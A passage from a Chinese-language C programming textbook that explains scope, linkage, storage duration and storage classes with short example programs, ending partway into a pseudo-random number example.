量可用于多个函数,所以文件作用域变量也称为全局变量(global variable)。 注意 翻译单元和文件 你认为的多个文件在编译器中可能以一个文件出现。例如,通常在源代 码(.c扩展名)中包含一个或多个头文件(.h 扩展名)。头文件会依次包含 其他头文件,所以会包含多个单独的物理文件。但是,C预处理实际上是用 包含的头文件内容替换#include指令。所以,编译器源代码文件和所有的头 文件都看成是一个包含信息的单独文件。这个文件被称为翻译单元 (translation unit)。描述一个具有文件作用域的变量时,它的实际可见范围 是整个翻译单元。如果程序由多个源代码文件组成,那么该程序也将由多个 翻译单元组成。每个翻译单元均对应一个源代码文件和它所包含的文件。 12.1.2 链接 接下来,我们介绍链接。C 变量有 3 种链接属性:外部链接、内部链接 或无链接。具有块作用域、函数作用域或函数原型作用域的变量都是无链接 变量。这意味着这些变量属于定义它们的块、函数或原型私有。具有文件作 用域的变量可以是外部链接或内部链接。外部链接变量可以在多文件程序中 使用,内部链接变量只能在一个翻译单元中使用。 注意 正式和非正式术语 C 标准用“内部链接的文件作用域”描述仅限于一个翻译单元(即一个源 代码文件和它所包含的头文件)的作用域,用“外部链接的文件作用域”描述 可延伸至其他翻译单元的作用域。但是,对程序员而言这些术语太长了。一 些程序员把“内部链接的文件作用域”简称为“文件作用域”,把“外部链接的 文件作用域”简称为“全局作用域”或“程序作用域”。 863 如何知道文件作用域变量是内部链接还是外部链接?可以查看外部定义 中是否使用了存储类别说明符static: int giants = 5;       // 文件作用域,外部链接 static int dodgers = 3;   // 文件作用域,内部链接 int main() { ... } ... 
该文件和同一程序的其他文件都可以使用变量giants。而变量dodgers属 文件私有,该文件中的任意函数都可使用它。 12.1.3 存储期 作用域和链接描述了标识符的可见性。存储期描述了通过这些标识符访 问的对象的生存期。C对象有4种存储期:静态存储期、线程存储期、自动 存储期、动态分配存储期。 如果对象具有静态存储期,那么它在程序的执行期间一直存在。文件作 用域变量具有静态存储期。注意,对于文件作用域变量,关键字 static表明 了其链接属性,而非存储期。以 static声明的文件作用域变量具有内部链 接。但是无论是内部链接还是外部链接,所有的文件作用域变量都具有静态 存储期。 线程存储期用于并发程序设计,程序执行可被分为多个线程。具有线程 存储期的对象,从被声明时到线程结束一直存在。以关键字_Thread_local声 明一个对象时,每个线程都获得该变量的私有备份。 864 块作用域的变量通常都具有自动存储期。当程序进入定义这些变量的块 时,为这些变量分配内存;当退出这个块时,释放刚才为变量分配的内存。 这种做法相当于把自动变量占用的内存视为一个可重复使用的工作区或暂存 区。例如,一个函数调用结束后,其变量占用的内存可用于储存下一个被调 用函数的变量。 变长数组稍有不同,它们的存储期从声明处到块的末尾,而不是从块的 开始处到块的末尾。 我们到目前为止使用的局部变量都是自动类别。例如,在下面的代码 中,变量number和index在每次调用bore()函数时被创建,在离开函数时被销 毁: void bore(int number) { int index; for (index = 0; index < number; index++) puts("They don't make them the way they used to.\n"); return 0; } 然而,块作用域变量也能具有静态存储期。为了创建这样的变量,要把 变量声明在块中,且在声明前面加上关键字static: void more(int number) { int index; 865 static int ct = 0; ... return 0; } 这里,变量ct储存在静态内存中,它从程序被载入到程序结束期间都存 在。但是,它的作用域定义在more()函数块中。只有在执行该函数时,程序 才能使用ct访问它所指定的对象(但是,该函数可以给其他函数提供该存储 区的地址以便间接访问该对象,例如通过指针形参或返回值)。 C 使用作用域、链接和存储期为变量定义了多种存储方案。本书不涉及 并发程序设计,所以不再赘述这方面的内容。已分配存储期在本章后面介 绍。因此,剩下5种存储类别:自动、寄存器、静态块作用域、静态外部链 接、静态内部链接,如表12.1所列。现在,我们已经介绍了作用域、链接和 存储期,接下来将详细讨论这些存储类别。 表12.1 5种存储类别 12.1.4 自动变量 属于自动存储类别的变量具有自动存储期、块作用域且无链接。默认情 况下,声明在块或函数头中的任何变量都属于自动存储类别。为了更清楚地 表达你的意图(例如,为了表明有意覆盖一个外部变量定义,或者强调不要 把该变量改为其他存储类别),可以显式使用关键字auto,如下所示: int main(void) 866 { auto int plox; 关键字auto是存储类别说明符(storage-class specifier)。auto关键字在 C++中的用法完全不同,如果编写C/C++兼容的程序,最好不要使用auto作 为存储类别说明符。 块作用域和无链接意味着只有在变量定义所在的块中才能通过变量名访 问该变量(当然,参数用于传递变量的值和地址给另一个函数,但是这是间 接的方法)。另一个函数可以使用同名变量,但是该变量是储存在不同内存 位置上的另一个变量。 变量具有自动存储期意味着,程序在进入该变量声明所在的块时变量存 在,程序在退出该块时变量消失。原来该变量占用的内存位置现在可做他 用。 接下来分析一下嵌套块的情况。块中声明的变量仅限于该块及其包含的 块使用。 int loop(int n) { int m; // m 的作用域 scanf("%d", &m); { int i; // m 和 i 的作用域 for (i = m; i < n; i++) puts("i is local to a sub-block\n"); 867 } return m; // m 的作用域,i 已经消失 } 在上面的代码中,i仅在内层块中可见。如果在内层块的前面或后面使 用i,编译器会报错。通常,在设计程序时用不到这个特性。然而,如果这 个变量仅供该块使用,那么在块中就近定义该变量也很方便。这样,可以在 靠近使用变量的地方记录其含义。另外,这样的变量只有在使用时才占用内 存。变量n和 m 分别定义在函数头和外层块中,它们的作用域是整个函数, 而且在调用函数到函数结束期间都一直存在。 如果内层块中声明的变量与外层块中的变量同名会怎样?内层块会隐藏 外层块的定义。但是离开内层块后,外层块变量的作用域又回到了原来的作 用域。程序清单12.1演示了这一过程。 程序清单12.1 hiding.c程序 // hiding.c -- 块中的变量 #include <stdio.h> int main() { int x = 30;       // 原始的 x printf("x in outer block: %d at %p\n", x, &x); { int x = 77;     // 新的 x,隐藏了原始的 x printf("x in inner block: %d at %p\n", x, &x); 868 } printf("x in outer block: %d at %p\n", x, &x); while (x++ < 33)    // 原始的 x { int x = 100;    // 新的 x,隐藏了原始的 x x++; printf("x in while loop: %d at %p\n", x, &x); } printf("x in outer block: %d at %p\n", x, &x); return 0; } 下面是该程序的输出: x in outer block: 30 at 0x7fff5fbff8c8 x in inner block: 77 at 0x7fff5fbff8c4 x in outer block: 30 at 0x7fff5fbff8c8 x in while loop: 101 at 0x7fff5fbff8c0 x in while loop: 101 at 0x7fff5fbff8c0 x in while loop: 101 at 0x7fff5fbff8c0 x in outer block: 34 at 0x7fff5fbff8c8 869 首先,程序创建了变量x并初始化为30,如第1条printf()语句所示。然 后,定义了一个新的变量x,并设置为77,如第2条printf()语句所示。根据显 示的地址可知,新变量隐藏了原始的x。第3条printf()语句位于第1个内层块 后面,显示的是原始的x的值,这说明原始的x既没有消失也不曾改变。 也许该程序最难懂的是while循环。while循环的测试条件中使用的是原 始的x: while(x++ < 33) 在该循环中,程序创建了第3个x变量,该变量只定义在while循环中。 所以,当执行到循环体中的x++时,递增为101的是新的x,然后printf()语句 显示了该值。每轮迭代结束,新的x变量就消失。然后循环的测试条件使用 并递增原始的x,再次进入循环体,再次创建新的x。在该例中,这个x被创 建和销毁了3次。注意,该循环必须在测试条件中递增x,因为如果在循环体 中递增x,那么递增的是循环体中创建的x,而非测试条件中使用的原始x。 我们使用的编译器在创建while循环体中的x时,并未复用内层块中x占 用的内存,但是有些编译器会这样做。 该程序示例的用意不是鼓励读者要编写类似的代码(根据C的命名规 则,要想出别的变量名并不难),而是为了解释在内层块中定义变量的具体 情况。 1.没有花括号的块 前面提到一个C99特性:作为循环或if语句的一部分,即使不使用花括 号({}),也是一个块。更完整地说,整个循环是它所在块的子块(sub- 
block),循环体是整个循环块的子块。与此类似,if 语句是一个块,与其 相关联的子语句是if语句的子块。这些规则会影响到声明的变量和这些变量 的作用域。程序清单12.2演示了for循环中该特性的用法。 程序清单12.2 forc99.c程序 870 // forc99.c -- 新的 C99 块规则 #include <stdio.h> int main() { int n = 8; printf("  Initially, n = %d at %p\n", n, &n); for (int n = 1; n < 3; n++) printf("    loop 1: n = %d at %p\n", n, &n); printf("After loop 1, n = %d at %p\n", n, &n); for (int n = 1; n < 3; n++) { printf(" loop 2 index n = %d at %p\n", n, &n); int n = 6; printf("    loop 2: n = %d at %p\n", n, &n); n++; } printf("After loop 2, n = %d at %p\n", n, &n); return 0; } 871 假设编译器支持C语言的这个新特性,该程序的输出如下: Initially, n = 8 at 0x7fff5fbff8c8 loop 1: n = 1 at 0x7fff5fbff8c4 loop 1: n = 2 at 0x7fff5fbff8c4 After loop 1, n = 8 at 0x7fff5fbff8c8 loop 2 index n = 1 at 0x7fff5fbff8c0 loop 2: n = 6 at 0x7fff5fbff8bc loop 2 index n = 2 at 0x7fff5fbff8c0 loop 2: n = 6 at 0x7fff5fbff8bc After loop 2, n = 8 at 0x7fff5fbff8c8 第1个for循环头中声明的n,其作用域作用至循环末尾,而且隐藏了原 始的n。但是,离开循环后,原始的n又起作用了。 第2个for循环头中声明的n作为循环的索引,隐藏了原始的n。然后,在 循环体中又声明了一个n,隐藏了索引n。结束一轮迭代后,声明在循环体中 的n消失,循环头使用索引n进行测试。当整个循环结束时,原始的 n 又起作 用了。再次提醒读者注意,没必要在程序中使用相同的变量名。如果用了, 各变量的情况如上所述。 注意 支持C99和C11 有些编译器并不支持C99/C11的这些作用域规则(Microsoft Visual Studio 2012就是其中之一)。有些编译会提供激活这些规则的选项。例如,撰写本 书时,gcc默认支持了C99的许多特性,但是要用 选项激活程序 清单12.2中使用的特性: 872 gcc –std=c99 forc99.c 与此类似,gcc或clang都要使用 或 选项,才支持 C11特性。 2.自动变量的初始化 自动变量不会初始化,除非显式初始化它。考虑下面的声明: int main(void) { int repid; int tents = 5; tents变量被初始化为5,但是repid变量的值是之前占用分配给repid的空 间中的任意值(如果有的话),别指望这个值是0。可以用非常量表达式 (non-constant expression)初始化自动变量,前提是所用的变量已在前面定 义过: int main(void) { int ruth = 1; int rance = 5 * ruth; // 使用之前定义的变量 12.1.5 寄存器变量 变量通常储存在计算机内存中。如果幸运的话,寄存器变量储存在CPU 的寄存器中,或者概括地说,储存在最快的可用内存中。与普通变量相比, 访问和处理这些变量的速度更快。由于寄存器变量储存在寄存器而非内存 中,所以无法获取寄存器变量的地址。绝大多数方面,寄存器变量和自动变 873 量都一样。也就是说,它们都是块作用域、无链接和自动存储期。使用存储 类别说明符register便可声明寄存器变量: int main(void) { register int quick; 我们刚才说“如果幸运的话”,是因为声明变量为register类别与直接命令 相比更像是一种请求。编译器必须根据寄存器或最快可用内存的数量衡量你 的请求,或者直接忽略你的请求,所以可能不会如你所愿。在这种情况下, 寄存器变量就变成普通的自动变量。即使是这样,仍然不能对该变量使用地 址运算符。 在函数头中使用关键字register,便可请求形参是寄存器变量: void macho(register int n) 可声明为register的数据类型有限。例如,处理器中的寄存器可能没有足 够大的空间来储存double类型的值。 12.1.6 块作用域的静态变量 静态变量(static variable)听起来自相矛盾,像是一个不可变的变量。 实际上,静态的意思是该变量在内存中原地不动,并不是说它的值不变。具 有文件作用域的变量自动具有(也必须是)静态存储期。前面提到过,可以 创建具有静态存储期、块作用域的局部变量。这些变量和自动变量一样,具 有相同的作用域,但是程序离开它们所在的函数后,这些变量不会消失。也 就是说,这种变量具有块作用域、无链接,但是具有静态存储期。计算机在 多次函数调用之间会记录它们的值。在块中(提供块作用域和无链接)以存 储类别说明符static(提供静态存储期)声明这种变量。程序清单12.3演示了 一个这样的例子。 874 程序清单12.3 loc_stat.c程序 /* loc_stat.c -- 使用局部静态变量 */ #include <stdio.h> void trystat(void); int main(void) { int count; for (count = 1; count <= 3; count++) { printf("Here comes iteration %d:\n", count); trystat(); } return 0; } void trystat(void) { int fade = 1; static int stay = 1; printf("fade = %d and stay = %d\n", fade++, stay++); 875 } 注意,trystat()函数先打印再递增变量的值。该程序的输出如下: Here comes iteration 1: fade = 1 and stay = 1 Here comes iteration 2: fade = 1 and stay = 2 Here comes iteration 3: fade = 1 and stay = 3 静态变量stay保存了它被递增1后的值,但是fade变量每次都是1。这表 明了初始化的不同:每次调用trystat()都会初始化fade,但是stay只在编译 strstat()时被初始化一次。如果未显式初始化静态变量,它们会被初始化为 0。 下面两个声明很相似: int fade = 1; static int stay = 1; 第1条声明确实是trystat()函数的一部分,每次调用该函数时都会执行这 条声明。这是运行时行为。第2条声明实际上并不是trystat()函数的一部分。 如果逐步调试该程序会发现,程序似乎跳过了这条声明。这是因为静态变量 和外部变量在程序被载入内存时已执行完毕。把这条声明放在trystat()函数 中是为了告诉编译器只有trystat()函数才能看到该变量。这条声明并未在运 行时执行。 不能在函数的形参中使用static: 876 int wontwork(static int flu); // 不允许 “局部静态变量”是描述具有块作用域的静态变量的另一个术语。阅读一 些老的 C文献时会发现,这种存储类别被称为内部静态存储类别(internal static storage class)。这里的内部指的是函数内部,而非内部链接。 12.1.7 外部链接的静态变量 外部链接的静态变量具有文件作用域、外部链接和静态存储期。该类别 有时称为外部存储类别(external storage 
class),属于该类别的变量称为外 部变量(external variable)。把变量的定义性声明(defining declaration)放 在在所有函数的外面便创建了外部变量。当然,为了指出该函数使用了外部 变量,可以在函数中用关键字extern再次声明。如果一个源代码文件使用的 外部变量定义在另一个源代码文件中,则必须用extern在该文件中声明该变 量。如下所示: int Errupt;        /* 外部定义的变量 */ double Up[100];      /* 外部定义的数组 */ extern char Coal;     /* 如果Coal被定义在另一个文件, */ /*则必须这样声明*/ void next(void); int main(void) { extern int Errupt;   /* 可选的声明*/ extern double Up[];  /* 可选的声明*/ ... 877 } void next(void) { ... } 注意,在main()中声明Up数组时(这是可选的声明)不用指明数组大 小,因为第1次声明已经提供了数组大小信息。main()中的两条 extern 声明完 全可以省略,因为外部变量具有文件作用域,所以Errupt和Up从声明处到文 件结尾都可见。它们出现在那里,仅为了说明main()函数要使用这两个变 量。 如果省略掉函数中的extern关键字,相当于创建了一个自动变量。去掉 下面声明中的extern: extern int Errupt; 便成为: int Errupt; 这使得编译器在 main()中创建了一个名为 Errupt 的自动变量。它是一个 独立的局部变量,与原来的外部变量Errupt不同。该局部变量仅main()中可 见,但是外部变量Errupt对于该文件的其他函数(如 next())也可见。简而 言之,在执行块中的语句时,块作用域中的变量将“隐藏”文件作用域中的同 名变量。如果不得已要使用与外部变量同名的局部变量,可以在局部变量的 声明中使用 auto 存储类别说明符明确表达这种意图。 外部变量具有静态存储期。因此,无论程序执行到main()、next()还是其 他函数,数组Up及其值都一直存在。 878 下面 3 个示例演示了外部和自动变量的一些使用情况。示例 1 中有一个 外部变量 Hocus。该变量对main()和magic()均可见。 /* 示例1 */ int Hocus; int magic(); int main(void) { extern int Hocus; // Hocus 之前已声明为外部变量 ... } int magic() { extern int Hocus; // 与上面的Hocus 是同一个变量 ... } 示例2中有一个外部变量Hocus,对两个函数均可见。这次,在默认情况 下对magic()可见。 /*示例2 */ int Hocus; int magic(); 879 int main(void) { extern int Hocus; // Hocus之前已声明为外部变量 ... } int magic() { //并未在该函数中声明Hocus,但是仍可使用该变量 ... } 在示例3中,创建了4个独立的变量。main()中的Hocus变量默认是自动 变量,属于main()私有。magic()中的Hocus变量被显式声明为自动,只有 magic()可用。外部变量Houcus对main()和magic()均不可见,但是对该文件中 未创建局部Hocus变量的其他函数可见。最后,Pocus是外部变量,magic()可 见,但是main()不可见,因为Pocus被声明在main()后面。 /* 示例 3 */ int Hocus; int magic(); int main(void) { 880 int Hocus; // 声明Hocus,默认是自动变量 ... } int Pocus; int magic() { auto int Hocus; //把局部变量Hocus显式声明为自动变量 ... } 这 3 个示例演示了外部变量的作用域是:从声明处到文件结尾。除此之 外,还说明了外部变量的生命期。外部变量Hocus和Pocus在程序运行中一直 存在,因为它们不受限于任何函数,不会在某个函数返回后就消失。 1.初始化外部变量 外部变量和自动变量类似,也可以被显式初始化。与自动变量不同的 是,如果未初始化外部变量,它们会被自动初始化为 0。这一原则也适用于 外部定义的数组元素。与自动变量的情况不同,只能使用常量表达式初始化 文件作用域变量: int x = 10;          // 没问题,10是常量 int y = 3 + 20;       // 没问题,用于初始化的是常量表达式 size_t z = sizeof(int);   //没问题,用于初始化的是常量表达式 int x2 = 2 * x;      // 不行,x是变量 881 (只要不是变长数组,sizeof表达式可被视为常量表达式。) 2.使用外部变量 下面来看一个使用外部变量的示例。假设有两个函数main()和critic(), 它们都要访问变量units。可以把units声明在这两个函数的上面,如程序清单 12.4所示(注意:该例的目的是演示外部变量的工作原理,并非它的典型用 法)。 程序清单12.4 global.c程序 /* global.c -- 使用外部变量 */ #include <stdio.h> int units = 0;    /* 外部变量 */ void critic(void); int main(void) { extern int units; /* 可选的重复声明 */ printf("How many pounds to a firkin of butter?\n"); scanf("%d", &units); while (units != 56) critic(); printf("You must have looked it up!\n"); return 0; 882 } void critic(void) { /* 删除了可选的重复声明 */ printf("No luck, my friend. Try again.\n"); scanf("%d", &units); } 下面是该程序的输出示例: How many pounds to a firkin of butter? 14 No luck, my friend. Try again. 56 You must have looked it up! 
注意,critic()是如何读取 units的第2 个值的。当while循环结束时, main()也知道units的新值。所以main()函数和critic()都可以通过标识符units访 问相同的变量。用C的术语来描述是, units具有文件作用域、外部链接和静 态存储期。 把units定义在所有函数定义外面(即外部),units便是一个外部变量, 对units定义下面的所有函数均可见。因此,critics()可以直接使用units变量。 类似地,main()也可直接访问units。但是,main()中确实有如下声明: 883 extern int units; 本例中,以上声明主要是为了指出该函数要使用这个外部变量。存储类 别说明符extern告诉编译器,该函数中任何使用units的地方都引用同一个定 义在函数外部的变量。再次强调,main()和critic()使用的都是外部定义的 units。 3.外部名称 C99和C11标准都要求编译器识别局部标识符的前63个字符和外部标识 符的前31个字符。这修订了以前的标准,即编译器识别局部标识符前31个字 符和外部标识符前6个字符。你所用的编译器可能还执行以前的规则。外部 变量名比局部变量名的规则严格,是因为外部变量名还要遵循局部环境规 则,所受的限制更多。 4.定义和声明 下面进一步介绍定义变量和声明变量的区别。考虑下面的例子: int tern = 1; /* tern被定义 */ main() { extern int tern; /* 使用在别处定义的tern */ 这里,tern被声明了两次。第1次声明为变量预留了存储空间,该声明构 成了变量的定义。第2次声明只告诉编译器使用之前已创建的tern变量,所以 这不是定义。第1次声明被称为定义式声明(defining declaration),第2次声 明被称为引用式声明(referencing declaration)。关键字extern表明该声明不 是定义,因为它指示编译器去别处查询其定义。 假设这样写: 884 extern int tern; int main(void) { 编译器会假设 tern 实际的定义在该程序的别处,也许在别的文件中。该 声明并不会引起分配存储空间。因此,不要用关键字extern创建外部定义, 只用它来引用现有的外部定义。 外部变量只能初始化一次,且必须在定义该变量时进行。假设有下面的 代码: // file_one.c char permis = 'N'; ... // file_two.c extern char permis = 'Y'; /* 错误 */ file_two中的声明是错误的,因为file_one.c中的定义式声明已经创建并 初始化了permis。 12.1.8 内部链接的静态变量 该存储类别的变量具有静态存储期、文件作用域和内部链接。在所有函 数外部(这点与外部变量相同),用存储类别说明符static定义的变量具有 这种存储类别: static int svil = 1;  // 静态变量,内部链接 int main(void) 885 { 这种变量过去称为外部静态变量(external static variable),但是这个 术语有点自相矛盾(这些变量具有内部链接)。但是,没有合适的新简称, 所以只能用内部链接的静态变量(static variable with internal linkage)。普通 的外部变量可用于同一程序中任意文件中的函数,但是内部链接的静态变量 只能用于同一个文件中的函数。可以使用存储类别说明符 extern,在函数中 重复声明任何具有文件作用域的变量。这样的声明并不会改变其链接属性。 考虑下面的代码: int traveler = 1;      // 外部链接 static int stayhome = 1;  // 内部链接 int main() { extern int traveler;  // 使用定义在别处的 traveler extern int stayhome;  // 使用定义在别处的 stayhome ... 对于该程序所在的翻译单元,trveler和stayhome都具有文件作用域,但 是只有traveler可用于其他翻译单元(因为它具有外部链接)。这两个声明 都使用了extern关键字,指明了main()中使用的这两个变量的定义都在别处, 但是这并未改变stayhome的内部链接属性。 12.1.9 多文件 只有当程序由多个翻译单元组成时,才体现区别内部链接和外部链接的 重要性。接下来简要介绍一下。 复杂的C程序通常由多个单独的源代码文件组成。有时,这些文件可能 886 要共享一个外部变量。C通过在一个文件中进行定义式声明,然后在其他文 件中进行引用式声明来实现共享。也就是说,除了一个定义式声明外,其他 声明都要使用extern关键字。而且,只有定义式声明才能初始化变量。 注意,如果外部变量定义在一个文件中,那么其他文件在使用该变量之 前必须先声明它(用 extern关键字)。也就是说,在某文件中对外部变量进 行定义式声明只是单方面允许其他文件使用该变量,其他文件在用extern声 明之前不能直接使用它。 过去,不同的编译器遵循不同的规则。例如,许多 UNIX系统允许在多 个文件中不使用 extern 关键字声明变量,前提是只有一个带初始化的声明。 编译器会把文件中一个带初始化的声明视为该变量的定义。 12.1.10 存储类别说明符 读者可能已经注意到了,关键字static和extern的含义取决于上下文。C 语言有6个关键字作为存储类别说明符:auto、register、static、extern、 _Thread_local和typedef。typedef关键字与任何内存存储无关,把它归于此类 有一些语法上的原因。尤其是,在绝大多数情况下,不能在声明中使用多个 存储类别说明符,所以这意味着不能使用多个存储类别说明符作为typedef的 一部分。唯一例外的是_Thread_local,它可以和static或extern一起使用。 auto说明符表明变量是自动存储期,只能用于块作用域的变量声明中。 由于在块中声明的变量本身就具有自动存储期,所以使用auto主要是为了明 确表达要使用与外部变量同名的局部变量的意图。 register 说明符也只用于块作用域的变量,它把变量归为寄存器存储类 别,请求最快速度访问该变量。同时,还保护了该变量的地址不被获取。 用 static 说明符创建的对象具有静态存储期,载入程序时创建对象,当 程序结束时对象消失。如果static 用于文件作用域声明,作用域受限于该文 件。如果 static 用于块作用域声明,作用域则受限于该块。因此,只要程序 在运行对象就存在并保留其值,但是只有在执行块内的代码时,才能通过标 887 识符访问。块作用域的静态变量无链接。文件作用域的静态变量具有内部链 接。 extern 说明符表明声明的变量定义在别处。如果包含 extern 的声明具有 文件作用域,则引用的变量必须具有外部链接。如果包含 extern 的声明具有 块作用域,则引用的变量可能具有外部链接或内部链接,这接取决于该变量 的定义式声明。 小结:存储类别 自动变量具有块作用域、无链接、自动存储期。它们是局部变量,属于 其定义所在块(通常指函数)私有。寄存器变量的属性和自动变量相同,但 是编译器会使用更快的内存或寄存器储存它们。不能获取寄存器变量的地 址。 具有静态存储期的变量可以具有外部链接、内部链接或无链接。在同一 个文件所有函数的外部声明的变量是外部变量,具有文件作用域、外部链接 和静态存储期。如果在这种声明前面加上关键字static,那么其声明的变量 具有文件作用域、内部链接和静态存储期。如果在函数中用 static 声明一个 变量,则该变量具有块作用域、无链接、静态存储期。 具有自动存储期的变量,程序在进入该变量的声明所在块时才为其分配 内存,在退出该块时释放之前分配的内存。如果未初始化,自动变量中是垃 圾值。程序在编译时为具有静态存储期的变量分配内存,并在程序的运行过 程中一直保留这块内存。如果未初始化,这样的变量会被设置为0。 具有块作用域的变量是局部的,属于包含该声明的块私有。具有文件作 用域的变量对文件(或翻译单元)中位于其声明后面的所有函数可见。具有 外部链接的文件作用域变量,可用于该程序的其他翻译单元。具有内部链接 
的文件作用域变量,只能用于其声明所在的文件内。 下面用一个简短的程序使用了5种存储类别。该程序包含两个文件(程 序清单12.5和程序清单12.6),所以必须使用多文件编译(参见第9章或参看 888 编译器的指导手册)。该示例仅为了让读者熟悉5种存储类别的用法,并不 是提供设计模型,好的设计可以不需要使用文件作用域变量。 程序清单12.5 parta.c程序 // parta.c --- 不同的存储类别 // 与 partb.c 一起编译 #include <stdio.h> void report_count(); void accumulate(int k); int count = 0;     // 文件作用域,外部链接 int main(void) { int value;     // 自动变量 register int i;  // 寄存器变量 printf("Enter a positive integer (0 to quit): "); while (scanf("%d", &value) == 1 && value > 0) { ++count;    // 使用文件作用域变量 for (i = value; i >= 0; i--) accumulate(i); 889 printf("Enter a positive integer (0 to quit): "); } report_count(); return 0; } void report_count() { printf("Loop executed %d times\n", count); } 程序清单12.6 partb.c程序 // partb.c -- 程序的其余部分 // 与 parta.c 一起编译 #include <stdio.h> extern int count;      // 引用式声明,外部链接 static int total = 0;    // 静态定义,内部链接 void accumulate(int k);   // 函数原型 void accumulate(int k)// k 具有块作用域,无链接 { static int subtotal = 0;  // 静态,无链接 890 if (k <= 0) { printf("loop cycle: %d\n", count); printf("subtotal: %d; total: %d\n", subtotal, total); subtotal = 0; } else { subtotal += k; total += k; } } 在该程序中,块作用域的静态变量subtotal统计每次while循环传入 accumulate()函数的总数,具有文件作用域、内部链接的变量 total 统计所有 传入 accumulate()函数的总数。当传入负值时, accumulate()函数报告total和 subtotal的值,并在报告后重置subtotal为0。由于parta.c调用了 accumulate()函 数,所以必须包含 accumulate()函数的原型。而 partb.c 只包含了accumulate() 函数的定义,并未在文件中调用该函数,所以其原型为可选(即省略原型也 不影响使用)。该函数使用了外部变量count 统计main()中的while循环迭代 的次数(顺带一提,对于该程序,没必要使用外部变量把 parta.c 和 partb.c 的代码弄得这么复杂)。在 parta.c 中,main()和report_count()共享count。 下面是程序的运行示例: 891 Enter a positive integer (0 to quit): 5 loop cycle: 1 subtotal: 15; total: 15 Enter a positive integer (0 to quit): 10 loop cycle: 2 subtotal: 55; total: 70 Enter a positive integer (0 to quit): 2 loop cycle: 3 subtotal: 3; total: 73 Enter a positive integer (0 to quit): 0 Loop executed 3 times 12.1.11 存储类别和函数 函数也有存储类别,可以是外部函数(默认)或静态函数。C99 新增了 第 3 种类别——内联函数,将在第16章中介绍。外部函数可以被其他文件的 函数访问,但是静态函数只能用于其定义所在的文件。假设一个文件中包含 了以下函数原型: double gamma(double);   /* 该函数默认为外部函数 */ static double beta(int, int); extern double delta(double, int); 在同一个程序中,其他文件中的函数可以调用gamma()和delta(),但是 892 不能调用beta(),因为以static存储类别说明符创建的函数属于特定模块私 有。这样做避免了名称冲突的问题,由于beta()受限于它所在的文件,所以 在其他文件中可以使用与之同名的函数。 通常的做法是:用 extern 关键字声明定义在其他文件中的函数。这样做 是为了表明当前文件中使用的函数被定义在别处。除非使用static关键字, 否则一般函数声明都默认为extern。 12.1.12 存储类别的选择 对于“使用哪种存储类别”的回答绝大多数是“自动存储类别”,要知道默 认类别就是自动存储类别。初学者会认为外部存储类别很不错,为何不把所 有的变量都设置成外部变量,这样就不必使用参数和指针在函数间传递信息 了。然而,这背后隐藏着一个陷阱。如果这样做,A()函数可能违背你的意 图,私下修改B()函数使用的变量。多年来,无数程序员的经验表明,随意 使用外部存储类别的变量导致的后果远远超过了它所带来的便利。 唯一例外的是const数据。因为它们在初始化后就不会被修改,所以不 用担心它们被意外篡改: const int DAYS = 7; const char * MSGS[3] = {"Yes", "No", Maybe"}; 保护性程序设计的黄金法则是:“按需知道”原则。尽量在函数内部解决 该函数的任务,只共享那些需要共享的变量。除自动存储类别外,其他存储 类别也很有用。不过,在使用某类别之前先要考虑一下是否有必要这样做。 893 12.2 随机数函数和静态变量 学习了不同存储类别的概念后,我们来看几个相关的程序。首先,来看 一个使用内部链接的静态变量的函数:随机数函数。ANSI C库提供了rand() 函数生成随机数。生成随机数有多种算法,ANSI C允许C实现针对特定机器 使用最佳算法。然而,ANSI C标准还提供了一个可移植的标准算法,在不 同系统中生成相同的随机数。实际上,rand()是“伪随机数生成器”,意思是 可预测生成数字的实际序列。但是,数字在其取值范围内均匀分布。 为了看清楚程序内部的情况,我们使用可移植的ANSI版本,而不是编 译器内置的rand()函数。可移植版本的方案开始于一个“种子”数字。该函数 使用该种子生成新的数,这个新数又成为新的种子。然后,新种子可用于生 成更新的种子,以此类推。该方案要行之有效,随机数函数必须记录它上一 次被调用时所使用的种子。这里需要一个静态变量。程序清单12.7演示了版 本0(稍后给出版本1)。 程序清单12.7 rand0.c函数文件 /* rand0.c --生成随机数*/ /* 使用 ANSI C 可移植算法 */ static unsigned long int next = 1; /* 种子 */ unsigned int rand0(void) { /* 生成伪随机数的魔术公式 */ next = next * 1103515245 + 12345; return (unsigned int) (next / 65536) % 32768; 894 } 在程序清单12.7中,静态变量next的初始值是1,其值在每次调用rand0() 函数时都会被修改(通过魔术公式)。该函数是用于返回一个0~32767之间 的值。注意,next是具有内部链接的静态变量(并非无链接)。这是为了方 便稍后扩展本例,供同一个文件中的其他函数共享。 
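内部链接的好处之一是避免命名冲突:即使程序的另一个源文件也定义了自己的next,两者也互不相干。下面是一个示意性片段(文件名other.c和函数peek_next()都是为说明而假设的):
/* other.c -- 假设的另一个翻译单元 */
static unsigned long int next = 42;   /* 与 rand0.c 中的 next 是两个不同的对象 */

unsigned long int peek_next(void)
{
    return next;                       /* 只能访问本文件的 next */
}
把这两个文件一起编译并不会出现重复定义的错误;但如果去掉两处的static,让两个next都具有外部链接,链接时通常就会报告重复定义(具体的诊断信息因实现而异)。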
程序清单12.8是测试rand0()函数的一个简单的驱动程序。 程序清单12.8 r_drive0.c驱动程序 /* r_drive0.c -- 测试 rand0()函数 */ /* 与 rand0.c 一起编译*/ #include <stdio.h> extern unsigned int rand0(void); int main(void) { int count; for (count = 0; count < 5; count++) printf("%d\n", rand0()); return 0; } 该程序也需要多文件编译。程序清单 12.7 和程序清单 12.8 分别使用一 个文件。程序清单 12.8 中的extern关键字提醒读者rand0()被定义在其他文件 中,在这个文件中不要求写出该函数原型。输出如下: 895 16838 5758 10113 17515 31051 程序输出的数字看上去是随机的,再次运行程序后,输出如下: 16838 5758 10113 17515 31051 看来,这两次的输出完全相同,这体现了“伪随机”的一个方面。每次主 程序运行,都开始于相同的种子1。可以引入另一个函数srand1()重置种子来 解决这个问题。关键是要让next成为只供rand1()和srand1()访问的内部链接静 态变量(srand1()相当于C库中的srand()函数)。把srand1()加入rand1()所在 的文件中。程序清单12.9给出了修改后的文件。 程序清单12.9 s_and_r.c文件程序 /* s_and_r.c -- 包含 rand1() 和 srand1() 的文件  */ /*       使用 ANSI C 可移植算法   */ static unsigned long int next = 1; /* 种子 */ 896 int rand1(void) { /*生成伪随机数的魔术公式*/ next = next * 1103515245 + 12345; return (unsigned int) (next / 65536) % 32768; } void srand1(unsigned int seed) { next = seed; } 注意,next是具有内部链接的文件作用域静态变量。这意味着rand1()和 srand1()都可以使用它,但是其他文件中的函数无法访问它。使用程序清单 12.10的驱动程序测试这两个函数。 程序清单12.10 r_drive1.c驱动程序 /* r_drive1.c -- 测试 rand1() 和 srand1() */ /* 与 